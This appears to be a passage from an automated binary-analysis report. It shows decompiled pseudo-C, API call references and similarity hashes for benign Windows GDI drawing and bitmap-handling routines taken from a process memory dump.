API ID: AddressHandleModuleProc String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll API String ID: 1646373207-1918263038 Opcode ID: ea9ec8e8f90291ffff50c1c1e118d913d94cc886ee4d1766b9f2028276f0950e Instruction ID: 8f20ae1609fd2dd0fa028a6c57cffb4e97aaf0264b3ec7f3cdfbc11af4dc0977 Opcode Fuzzy Hash: ea9ec8e8f90291ffff50c1c1e118d913d94cc886ee4d1766b9f2028276f0950e Instruction Fuzzy Hash: 424124A16052045BE3047B6F785552BBB99D648714360CC7FF804FB6E1EB7CAC618A2F

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%

E00426DC4(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) { int _v8; int _v12; char _v13; struct HDC__* _v20; void* _v24; void* _v28; long _v32; long _v36; struct HPALETTE__* _v40; intOrPtr* _t78; struct HPALETTE__* _t89; struct HPALETTE__* _t95; int _t169; intOrPtr _t176; intOrPtr _t177; struct HDC__* _t179; int _t181; void* _t183; void* _t184; intOrPtr _t185; _t183 = _t184; _t185 = _t184 + 0xffffffdc; _v12 = __ecx; _v8 = __edx; _t179 = __eax; _t181 = _a16; _t169 = _a20; _v13 = 1; _t78 = *0x462f2c; // 0x4617c0 if( *_t78 != 2 || _t169 != _a40 || _t181 != _a36) { _v40 = 0; _v20 = E00426C14(CreateCompatibleDC(0)); _push(_t183); _push(0x427039); _push( *[fs:eax]); *[fs:eax] = _t185; _v24 = E00426C14(CreateCompatibleBitmap(_a32, _t169, _t181)); _v28 = SelectObject(_v20, _v24); _t89 = *0x46634c; // 0x65080609 _v40 = SelectPalette(_a32, _t89, 0); SelectPalette(_a32, _v40, 0); if(_v40 == 0) { _t95 = *0x46634c; // 0x65080609 _v40 = SelectPalette(_v20, _t95, 0xffffffff); } else { _v40 = SelectPalette(_v20, _v40, 0xffffffff); } RealizePalette(_v20); StretchBlt(_v20, 0, 0, _t169, _t181, _a12, _a8, _a4, _t169, _t181, 0xcc0020); StretchBlt(_v20, 0, 0, _t169, _t181, _a32, _a28, _a24, _t169, _t181, 0x440328); _v32 = SetTextColor(_t179, 0); _v36 = SetBkColor(_t179, 0xffffff); StretchBlt(_t179, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t169, _t181, 0x8800c6); StretchBlt(_t179, _v8, _v12, _a40, _a36, _v20, 0, 0, _t169, _t181, 0x660046); SetTextColor(_t179, _v32); SetBkColor(_t179, _v36); if(_v28 != 0) { SelectObject(_v20, _v28); } DeleteObject(_v24); _pop(_t176); *[fs:eax] = _t176; _push(0x427040); if(_v40 != 0) { SelectPalette(_v20, _v40, 0); } return DeleteDC(_v20); } else { _v24 = E00426C14(CreateCompatibleBitmap(_a32, 1, 1)); _v24 = SelectObject(_a12, _v24); _push(_t183); _push(0x426e8c); _push( *[fs:eax]); *[fs:eax] = _t185; MaskBlt(_t179, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, 0xccaa0029); _pop(_t177); *[fs:eax] = _t177; _push(0x427040); _v24 = SelectObject(_a12, _v24); return DeleteObject(_v24); } } 0x00426dc5 0x00426dc7 0x00426dcd 0x00426dd0 0x00426dd3 0x00426dd5 0x00426dd8 0x00426ddb 0x00426ddf 0x00426de7 0x00426e95 0x00426ea4 0x00426ea9 0x00426eaa 0x00426eaf 0x00426eb2 0x00426ec5 0x00426ed5 0x00426eda 0x00426ee9 0x00426ef6 0x00426eff 0x00426f17 0x00426f26 0x00426f01 0x00426f10 0x00426f10 0x00426f2d 0x00426f4f 0x00426f71 0x00426f7e 0x00426f8c 0x00426fb3 0x00426fd8 0x00426fe2 0x00426fec 0x00426ff5 0x00426fff 0x00426fff 0x00427008 0x0042700f 0x00427012 0x00427015 0x0042701e 0x0042702a 0x0042702a 0x00427038 0x00426dff 0x00426e11 0x00426e21 0x00426e26 0x00426e27 0x00426e2c 0x00426e2f 0x00426e60 0x00426e67 0x00426e6a 0x00426e6d 0x00426e7f 0x00426e8b 0x00426e8b

APIs

CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00426E07 SelectObject.GDI32(?,?), ref: 00426E1C MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,CCAA0029,00000000,00426E8C,?,?), ref: 00426E60 SelectObject.GDI32(?,?), ref: 00426E7A DeleteObject.GDI32(?), ref: 00426E86 CreateCompatibleDC.GDI32(00000000), ref: 00426E9A CreateCompatibleBitmap.GDI32(?,?,?), ref: 00426EBB SelectObject.GDI32(?,?), ref: 00426ED0 SelectPalette.GDI32(?,65080609,00000000), ref: 00426EE4 SelectPalette.GDI32(?,?,00000000), ref: 00426EF6 SelectPalette.GDI32(?,00000000,000000FF), ref: 00426F0B SelectPalette.GDI32(?,65080609,000000FF), ref: 00426F21 RealizePalette.GDI32(?), ref: 00426F2D StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00426F4F StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 00426F71 SetTextColor.GDI32(?,00000000), ref: 00426F79 SetBkColor.GDI32(?,00FFFFFF), ref: 00426F87 StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00426FB3 StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00426FD8 SetTextColor.GDI32(?,?), ref: 00426FE2 SetBkColor.GDI32(?,?), ref: 00426FEC SelectObject.GDI32(?,00000000), ref: 00426FFF DeleteObject.GDI32(?), ref: 00427008 SelectPalette.GDI32(?,00000000,00000000), ref: 0042702A DeleteDC.GDI32(?), ref: 00427033

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize String ID: API String ID: 3976802218-0 Opcode ID: 517ab2346d95a81a61c2b3fce6b0763266c4b79982b9ae684a357dafb73be95f Instruction ID: 9a8f0c8cc2b2705459631c9561ebf8b7562dc7de34ad384d938fd6bc3ac72156 Opcode Fuzzy Hash: 517ab2346d95a81a61c2b3fce6b0763266c4b79982b9ae684a357dafb73be95f Instruction Fuzzy Hash: B681A4B1A00219AFDB50EFA9CD81EAF77FCEB0D714F124459F618E7281C239AD108B65

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%

E00428D58(void* __eax, long __ecx, struct HPALETTE__* __edx) { struct HBITMAP__* _v8; struct HDC__* _v12; struct HDC__* _v16; struct HDC__* _v20; char _v21; void* _v28; void* _v32; intOrPtr _v92; intOrPtr _v96; int _v108; int _v112; void _v116; int _t68; long _t82; void* _t117; intOrPtr _t126; intOrPtr _t127; long _t130; struct HPALETTE__* _t133; void* _t137; void* _t139; intOrPtr _t140; _t137 = _t139; _t140 = _t139 + 0xffffff90; _t130 = __ecx; _t133 = __edx; _t117 = __eax; _v8 = 0; if(__eax == 0 || GetObjectA(__eax, 0x54, &_v116) == 0) { return _v8; } else { E0042824C(_t117); _v12 = 0; _v20 = 0; _push(_t137); _push(0x428f53); _push( *[fs:eax]); *[fs:eax] = _t140; _v12 = E00426C14(GetDC(0)); _v20 = E00426C14(CreateCompatibleDC(_v12)); _v8 = CreateBitmap(_v112, _v108, 1, 1, 0); if(_v8 == 0) { L17: _t68 = 0; _pop(_t126); *[fs:eax] = _t126; _push(0x428f5a); if(_v20 != 0) { _t68 = DeleteDC(_v20); } if(_v12 != 0) { return ReleaseDC(0, _v12); } return _t68; } else { _v32 = SelectObject(_v20, _v8); if(_t130 != 0x1fffffff) { _v16 = E00426C14(CreateCompatibleDC(_v12)); _push(_t137); _push(0x428f0b); _push( *[fs:eax]); *[fs:eax] = _t140; if(_v96 == 0) { _v21 = 0; } else { _v21 = 1; _v92 = 0; _t117 = E00428690(_t117, _t133, _t133, 0, &_v116); } _v28 = SelectObject(_v16, _t117); if(_t133 != 0) { SelectPalette(_v16, _t133, 0); RealizePalette(_v16); SelectPalette(_v20, _t133, 0); RealizePalette(_v20); } _t82 = SetBkColor(_v16, _t130); BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020); SetBkColor(_v16, _t82); if(_v28 != 0) { SelectObject(_v16, _v28); } if(_v21 != 0) { DeleteObject(_t117); } _pop(_t127); *[fs:eax] = _t127; _push(0x428f12); return DeleteDC(_v16); } else { PatBlt(_v20, 0, 0, _v112, _v108, 0x42); if(_v32 != 0) { SelectObject(_v20, _v32); } goto L17; } } } } 0x00428d59 0x00428d5b 0x00428d61 0x00428d63 0x00428d65 0x00428d69 0x00428d6e 0x00428f63 0x00428d88 0x00428d8a 0x00428d91 0x00428d96 0x00428d9b 0x00428d9c 0x00428da1 0x00428da4 0x00428db3 0x00428dc4 0x00428dda 0x00428de1 0x00428f25 0x00428f25 0x00428f27 0x00428f2a 0x00428f2d 0x00428f36 0x00428f3c 0x00428f3c 0x00428f45 0x00000000 0x00428f4d 0x00428f52 0x00428de7 0x00428df4 0x00428dfd 0x00428e29 0x00428e2e 0x00428e2f 0x00428e34 0x00428e37 0x00428e3e 0x00428e5e 0x00428e40 0x00428e40 0x00428e46 0x00428e5a 0x00428e5a 0x00428e6c 0x00428e71 0x00428e7a 0x00428e83 0x00428e8f 0x00428e98 0x00428e98 0x00428ea2 0x00428ec6 0x00428ed0 0x00428ed9 0x00428ee3 0x00428ee3 0x00428eec 0x00428eef 0x00428eef 0x00428ef6 0x00428ef9 0x00428efc 0x00428f0a 0x00428dff 0x00428e11 0x00428f16 0x00428f20 0x00428f20 0x00000000 0x00428f16 0x00428dfd 0x00428de1

APIs

GetObjectA.GDI32(?,00000054,?), ref: 00428D7B GetDC.USER32(00000000), ref: 00428DA9 CreateCompatibleDC.GDI32(?), ref: 00428DBA CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00428DD5 SelectObject.GDI32(?,00000000), ref: 00428DEF PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00428E11 CreateCompatibleDC.GDI32(?), ref: 00428E1F SelectObject.GDI32(?), ref: 00428E67 SelectPalette.GDI32(?,?,00000000), ref: 00428E7A RealizePalette.GDI32(?), ref: 00428E83 SelectPalette.GDI32(?,?,00000000), ref: 00428E8F RealizePalette.GDI32(?), ref: 00428E98 SetBkColor.GDI32(?), ref: 00428EA2 BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00428EC6 SetBkColor.GDI32(?,00000000), ref: 00428ED0 SelectObject.GDI32(?,00000000), ref: 00428EE3 DeleteObject.GDI32 ref: 00428EEF DeleteDC.GDI32(?), ref: 00428F05 SelectObject.GDI32(?,00000000), ref: 00428F20 DeleteDC.GDI32(00000000), ref: 00428F3C ReleaseDC.USER32 ref: 00428F4D

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease String ID: API String ID: 332224125-0 Opcode ID: 043915a6f0d82eb22a204992b68ef0e525db3ffd50e10b4cd51da9086477a0f8 Instruction ID: 9b296df3905ff11574ab74c4800e5112e9892f6b575cab52e3ab6da5b25098aa Opcode Fuzzy Hash: 043915a6f0d82eb22a204992b68ef0e525db3ffd50e10b4cd51da9086477a0f8 Instruction Fuzzy Hash: 92513F71F00315AFDB10EBE9DC45FAEB7FCEB08704F51446AB214E7281CA7999508B68

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%

E00429A80(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0, char* _a4) { intOrPtr _v8; intOrPtr* _v12; struct HDC__* _v16; struct HDC__* _v20; void* _v24; BITMAPINFOHEADER* _v28; intOrPtr _v32; intOrPtr _v36; signed int _v37; struct HBITMAP__* _v44; void* _v48; struct HPALETTE__* _v52; struct HPALETTE__* _v56; intOrPtr* _v60; intOrPtr* _v64; signed short _v66; signed short _v68; signed short _v70; signed short _v72; void* _v76; intOrPtr _v172; char _v174; intOrPtr _t151; signed int _t161; signed int _t165; intOrPtr _t169; signed int _t224; intOrPtr _t251; intOrPtr* _t255; intOrPtr _t261; signed int _t298; intOrPtr _t301; intOrPtr _t302; intOrPtr _t307; signed int _t328; void* _t330; void* _t331; signed int _t332; void* _t333; void* _t334; void* _t335; intOrPtr _t336; _t327 = __edi; _t334 = _t335; _t336 = _t335 + 0xffffff54; _t330 = __ecx; _v12 = __edx; _v8 = __eax; _v52 = 0; _v44 = 0; _v60 = 0; *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t333); _v37 = _v36 == 0xc; if(_v37 != 0) { _v36 = 0x28; } _v28 = E00402D0C(_v36 + 0x40c); _v64 = _v28; _push(_t334); _push(0x429fa1); _push( *[fs:edx]); *[fs:edx] = _t336; _push(_t334); _push(0x429f74); _push( *[fs:edx]); *[fs:edx] = _t336; if(_v37 == 0) { *((intOrPtr*)( *_v12 + 0xc))(); _t331 = _t330 - _v36; _t151 = *((intOrPtr*)(_v64 + 0x10)); if(_t151 != 3 && _t151 != 0) { _v60 = E004038F8(1); if(_a4 == 0) { E00403264( &_v174, 0xe); _v174 = 0x4d42; _v172 = _v36 + _t331; _a4 = &_v174; } *((intOrPtr*)( *_v60 + 0x10))(); *((intOrPtr*)( *_v60 + 0x10))(); *((intOrPtr*)( *_v60 + 0x10))(); E0041C924(_v60, *_v60, _v12, _t327, _t331, _t331, 0); *((intOrPtr*)( *_v60 + 0x14))(); _v12 = _v60; } } else { *((intOrPtr*)( *_v12 + 0xc))(); _t261 = _v64; E00403264(_t261, 0x28); _t251 = _t261; *(_t251 + 4) = _v72 & 0x0000ffff; *(_t251 + 8) = _v70 & 0x0000ffff; *((short*)(_t251 + 0xc)) = _v68 & 0x0000ffff; *((short*)(_t251 + 0xe)) = _v66 & 0x0000ffff; _t331 = _t330 - 0xc; } _t255 = _v64; *_t255 = _v36; _v32 = _v28 + _v36; if( *((short*)(_t255 + 0xc)) != 1) { E00426B00(); } if(_v36 == 0x28) { _t224 = *(_t255 + 0xe) & 0x0000ffff; if(_t224 == 0x10 || _t224 == 0x20) { if( *((intOrPtr*)(_t255 + 0x10)) == 3) { E0041C8B4(_v12, 0xc, _v32); _v32 = _v32 + 0xc; _t331 = _t331 - 0xc; } } } if( *(_t255 + 0x20) == 0) { *(_t255 + 0x20) = E00426D84( *(_t255 + 0xe) & 0x0000ffff); } _t328 = _v37 & 0x000000ff; _t79 = _t328 + 0x461ef0; // 0xc08b0304 E0041C8B4(_v12, *(_t255 + 0x20) * ( *_t79 & 0x000000ff), _v32); _t83 = _t328 + 0x461ef0; // 0xc08b0304 _t332 = _t331 - *(_t255 + 0x20) * ( *_t83 & 0x000000ff); if( *(_t255 + 0x14) == 0 || *((intOrPtr*)(_t255 + 0x10)) == 0) { _t298 = *(_t255 + 0xe) & 0x0000ffff; _t161 = E00426DA4( *((intOrPtr*)(_t255 + 4)), 0x20, _t298); asm("cdq"); *(_t255 + 0x14) = _t161 * (( *(_t255 + 8) ^ _t298) - _t298); } _t165 = *(_t255 + 0x14); if(_t332 > _t165) { _t332 = _t165; } if(_v37 != 0) { E00427050(_v32); } _v16 = E00426C14(GetDC(0)); _push(_t334); _push(0x429eef); _push( *[fs:edx]); *[fs:edx] = _t336; _t169 = *((intOrPtr*)(_v64 + 0x10)); if(_t169 == 0 || _t169 == 3) { if( *0x461c5c == 0) { _v44 = CreateDIBSection(_v16, _v28, 0, &_v24, 0, 0); if(_v44 == 0 || _v24 == 0) { if(GetLastError() != 0) { E0040D764(); } else { E00426B00(); } } _push(_t334); _push( *[fs:eax]); *[fs:eax] = _t336; E0041C8B4(_v12, _t332, _v24); _pop(_t301); *[fs:eax] = _t301; _t302 = 0x429ebe; *[fs:eax] = _t302; _push(0x429ef6); return ReleaseDC(0, _v16); } else { goto L28; } } else { L28: _v20 = 0; _v24 = E00402D0C(_t332); _push(_t334); _push(0x429e57); _push( *[fs:edx]); *[fs:edx] = _t336; E0041C8B4(_v12, _t332, _v24); _v20 = E00426C14(CreateCompatibleDC(_v16)); _v48 = SelectObject(_v20, CreateCompatibleBitmap(_v16, 1, 1)); _v56 = 0; _t198 = *((intOrPtr*)(_v64 + 0x20)); if( *((intOrPtr*)(_v64 + 0x20)) > 0) { _v52 = E0042730C(0, _t198); _v56 = SelectPalette(_v20, _v52, 0); RealizePalette(_v20); } _push(_t334); _push(0x429e2b); _push( *[fs:edx]); *[fs:edx] = _t336; _v44 = CreateDIBitmap(_v20, _v28, 4, _v24, _v28, 0); if(_v44 == 0) { if(GetLastError() != 0) { E0040D764(); } else { E00426B00(); } } _pop(_t307); *[fs:eax] = _t307; _push(0x429e32); if(_v56 != 0) { SelectPalette(_v20, _v56, 0xffffffff); } return DeleteObject(SelectObject(_v20, _v48)); } } 0x00429a80 0x00429a81 0x00429a83 0x00429a8c 0x00429a8e 0x00429a91 0x00429a96 0x00429a9b 0x00429aa0 0x00429ab0 0x00429ab7 0x00429abf 0x00429ac1 0x00429ac1 0x00429ad8 0x00429ade 0x00429ae3 0x00429ae4 0x00429ae9 0x00429aec 0x00429af1 0x00429af2 0x00429af7 0x00429afa 0x00429b01 0x00429b60 0x00429b63 0x00429b69 0x00429b6f 0x00429b89 0x00429b90 0x00429b9f 0x00429ba4 0x00429bb2 0x00429bbe 0x00429bbe 0x00429bce 0x00429bde 0x00429bf2 0x00429c01 0x00429c13 0x00429c19 0x00429c19 0x00429b03 0x00429b13 0x00429b16 0x00429b22 0x00429b27 0x00429b2d 0x00429b34 0x00429b3b 0x00429b43 0x00429b47 0x00429b47 0x00429c1c 0x00429c22 0x00429c2a 0x00429c32 0x00429c34 0x00429c34 0x00429c3d 0x00429c3f 0x00429c47 0x00429c53 0x00429c60 0x00429c65 0x00429c69 0x00429c69 0x00429c53 0x00429c47 0x00429c70 0x00429c7b 0x00429c7b 0x00429c81 0x00429c85 0x00429c95 0x00429c9d 0x00429ca6 0x00429cac 0x00429cb4 0x00429cc0 0x00429cca 0x00429cd2 0x00429cd2 0x00429cd5 0x00429cda 0x00429cdc 0x00429cdc 0x00429ce2 0x00429ce7 0x00429ce7 0x00429cf8 0x00429cfd 0x00429cfe 0x00429d03 0x00429d06 0x00429d0c 0x00429d11 0x00429d1f 0x00429e75 0x00429e7c 0x00429e8b 0x00429e94 0x00429e8d 0x00429e8d 0x00429e8d 0x00429e8b 0x00429e9b 0x00429ea1 0x00429ea4 0x00429eaf 0x00429eb6 0x00429eb9 0x00429ed8 0x00429edb 0x00429ede 0x00429eee 0x00000000 0x00000000 0x00000000 0x00429d25 0x00429d25 0x00429d27 0x00429d31 0x00429d36 0x00429d37 0x00429d3c 0x00429d3f 0x00429d4a 0x00429d5d 0x00429d77 0x00429d7c 0x00429d82 0x00429d87 0x00429d95 0x00429da7 0x00429dae 0x00429dae 0x00429db5 0x00429db6 0x00429dbb 0x00429dbe 0x00429dd7 0x00429dde 0x00429de7 0x00429df0 0x00429de9 0x00429de9 0x00429de9 0x00429de7 0x00429df7 0x00429dfa 0x00429dfd 0x00429e06 0x00429e12 0x00429e12 0x00429e2a 0x00429e2a

APIs

GetDC.USER32(00000000), ref: 00429CEE CreateCompatibleDC.GDI32(00000001), ref: 00429D53 CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 00429D68 SelectObject.GDI32(?,00000000), ref: 00429D72 SelectPalette.GDI32(?,?,00000000), ref: 00429DA2 RealizePalette.GDI32(?), ref: 00429DAE CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 00429DD2 GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00429E2B,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00429DE0 SelectPalette.GDI32(?,00000000,000000FF), ref: 00429E12 SelectObject.GDI32(?,?), ref: 00429E1F DeleteObject.GDI32(00000000), ref: 00429E25

Strings

( , xrefs: 00429C39 BM , xrefs: 00429BA4

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize String ID: ($BM API String ID: 2831685396-2980357723 Opcode ID: fc53f77d9d0130592b0a5017607ebe5ebc1f106cd622e18b61ea29ba8ac1efbb Instruction ID: 5f09fdd2a9c8d3bf44ec303fddff0b4bf25abaa9eceda00dd836569603864da6 Opcode Fuzzy Hash: fc53f77d9d0130592b0a5017607ebe5ebc1f106cd622e18b61ea29ba8ac1efbb Instruction Fuzzy Hash: FFD12970B002189FDF14EFA9D885BAEBBF5EF48304F55846AE904A7395D7389C40CB69

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 62%

E0044323C(intOrPtr* __eax, intOrPtr __edx) { intOrPtr* _v8; intOrPtr _v12; struct HDC__* _v16; struct tagRECT _v32; struct tagRECT _v48; signed int _v60; signed int _v64; struct HRGN__* _t169; signed int _t204; intOrPtr* _t210; intOrPtr* _t213; intOrPtr _t220; signed int _t223; intOrPtr _t247; signed int _t248; void* _t263; void* _t266; void* _t268; intOrPtr _t269; _t266 = _t268; _t269 = _t268 + 0xffffffc4; _v12 = __edx; _v8 = __eax; if( *(_v8 + 0x195) != 0 || *(_v8 + 0x19c) > 0) { _v16 = GetWindowDC(E004423F8(_v8)); _push(_t266); _push(0x4434ef); _push( *[fs:ecx]); *[fs:ecx] = _t269; GetClientRect(E004423F8(_v8), &_v32); GetWindowRect(E004423F8(_v8), &_v48); MapWindowPoints(0, E004423F8(_v8), &_v48, "true"); OffsetRect( &_v32, ~(_v48.left), ~(_v48.top)); ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); InflateRect( &_v32, *(_v8 + 0x19c), *(_v8 + 0x19c)); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t223 = GetWindowLongA(E004423F8(_v8), 0xfffffff0); if((_t223 & 0x00200000) != 0) { _t213 = *0x462c28; // 0x466310 _v48.right = _v48.right + *((intOrPtr*)( *_t213))(0x14); } if((_t223 & 0x00100000) != 0) { _t210 = *0x462c28; // 0x466310 _v48.bottom = _v48.bottom + *((intOrPtr*)( *_t210))(0x15); } if( *(_v8 + 0x195) != 0) { _t263 = 0; _t248 = *(_v8 + 0x193) & 0x000000ff; if(_t248 != 0) { _t263 = 0 + *((intOrPtr*)(_v8 + 0x198)); } _t204 = *(_v8 + 0x194) & 0x000000ff; if(_t204 != 0) { _t263 = _t263 + *((intOrPtr*)(_v8 + 0x198)); } if(( *(_v8 + 0x192) & 0x00000001) != 0) { _v48.left = _v48.left - _t263; } if(( *(_v8 + 0x192) & 0x00000002) != 0) { _v48.top = _v48.top - _t263; } if(( *(_v8 + 0x192) & 0x00000004) != 0) { _v48.right = _v48.right + _t263; } if(( *(_v8 + 0x192) & 0x00000008) != 0) { _v48.bottom = _v48.bottom + _t263; } DrawEdge(_v16, &_v48, *(0x46262c + (_t248 & 0x0000007f) * 4) | *(0x46263c + (_t204 & 0x0000007f) * 4), *(_v8 + 0x192) & 0x000000ff | *(0x46264c + ( *(_v8 + 0x195) & 0x000000ff) * 4) | *(0x46265c + ( *(_v8 + 0x1d9) & 0x000000ff) * 4) | 0x00002000); } IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t169 = *(_v12 + 4); if(_t169 != 1) { GetRgnBox(_t169, &_v32); MapWindowPoints(0, E004423F8(_v8), &_v32, "true"); IntersectRect( &_v48, &_v48, &_v32); OffsetRect( &_v48, ~_v64, ~_v60); } else { OffsetRect( &_v48, ~_v48, ~(_v48.top)); } FillRect(_v16, &_v48, E004261BC( *((intOrPtr*)(_v8 + 0x1a4)))); _pop(_t247); *[fs:eax] = _t247; _push(0x4434f6); return ReleaseDC(E004423F8(_v8), _v16); } else { *((intOrPtr*)( *_v8 - 0x10))(); _t220 = E0042DC7C(E0042DB74()); if(_t220 != 0) { _t220 = _v8; if(( *(_t220 + 0x52) & 0x00000002) != 0) { _t220 = E0042E248(E0042DB74(), 0, _v8); } } return _t220; } } 0x0044323d 0x0044323f 0x00443245 0x00443248 0x00443255 0x00443275 0x0044327a 0x0044327b 0x00443280 0x00443283 0x00443293 0x004432a5 0x004432bb 0x004432d0 0x004432e9 0x004432f4 0x004432f5 0x004432f6 0x004432f7 0x00443307 0x00443312 0x00443313 0x00443314 0x00443315 0x00443326 0x0044332e 0x00443332 0x0044333b 0x0044333b 0x00443344 0x00443348 0x00443351 0x00443351 0x0044335e 0x00443364 0x00443369 0x00443372 0x00443377 0x00443377 0x00443380 0x00443389 0x0044338e 0x0044338e 0x0044339e 0x004433a0 0x004433a0 0x004433ad 0x004433af 0x004433af 0x004433bc 0x004433be 0x004433be 0x004433cb 0x004433cd 0x004433cd 0x00443420 0x00443420 0x00443439 0x00443444 0x00443445 0x00443446 0x00443447 0x0044344b 0x00443451 0x00443472 0x00443488 0x00443499 0x004434ae 0x00443453 0x00443463 0x00443463 0x004434ca 0x004434d1 0x004434d4 0x004434d7 0x004434ee 0x004434f6 0x004434fe 0x00443506 0x0044350d 0x0044350f 0x00443516 0x00443522 0x00443522 0x00443516 0x0044352d 0x0044352d

APIs

GetWindowDC.USER32(00000000), ref: 00443270 GetClientRect.USER32 ref: 00443293 GetWindowRect.USER32 ref: 004432A5 MapWindowPoints.USER32 ref: 004432BB OffsetRect.USER32(?,?,?), ref: 004432D0 ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,?,00000000,?,00000000,?), ref: 004432E9 InflateRect.USER32(?,00000000,00000000), ref: 00443307 GetWindowLongA.USER32 ref: 00443321 DrawEdge.USER32(?,?,?,00000008), ref: 00443420 IntersectClipRect.GDI32(?,?,?,?,?), ref: 00443439 OffsetRect.USER32(?,?,?), ref: 00443463 GetRgnBox.GDI32(?,?), ref: 00443472 MapWindowPoints.USER32 ref: 00443488 IntersectRect.USER32 ref: 00443499 OffsetRect.USER32(?,?,?), ref: 004434AE FillRect.USER32 ref: 004434CA ReleaseDC.USER32 ref: 004434E9

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Window$Offset$ClipIntersectPoints$ClientDrawEdgeExcludeFillInflateLongRelease String ID: API String ID: 2490777911-0 Opcode ID: 6e3754b0df94dcb7bcdb5046d3db607f40a88203350a562e934c88a292f62008 Instruction ID: 7b120e4924686e31309899fdc82388f4ae83de811d5366100fd5c7bdcafe2d3f Opcode Fuzzy Hash: 6e3754b0df94dcb7bcdb5046d3db607f40a88203350a562e934c88a292f62008 Instruction Fuzzy Hash: 5EA12E71E00148AFDB01DFA9C986EDEB7F9AF09704F1440A6F915F7291C679AE01CB64

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%

E00429268(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) { intOrPtr _v8; struct HPALETTE__* _v12; char _v13; struct tagPOINT _v21; struct HDC__* _v28; void* _v32; struct HPALETTE__* _t78; signed int _t84; signed int _t85; signed int _t86; char _t87; void* _t140; intOrPtr* _t170; intOrPtr _t184; intOrPtr _t186; int* _t190; intOrPtr _t192; void* _t194; void* _t195; intOrPtr _t196; _t171 = __ecx; _t194 = _t195; _t196 = _t195 + 0xffffffe4; _t190 = __ecx; _v8 = __edx; _t170 = __eax; _t192 = *((intOrPtr*)(__eax + 0x28)); E004268F8(_v8, __ecx, *0x4294b4 & 0x000000ff, __ecx); E004297F8(_t170); _v12 = 0; _v13 = 0; _t78 = *(_t192 + 0x10); if(_t78 != 0) { _v12 = SelectPalette( *(_v8 + 4), _t78, 0xffffffff); RealizePalette( *(_v8 + 4)); _v13 = 1; } _push(GetDeviceCaps( *(_v8 + 4), 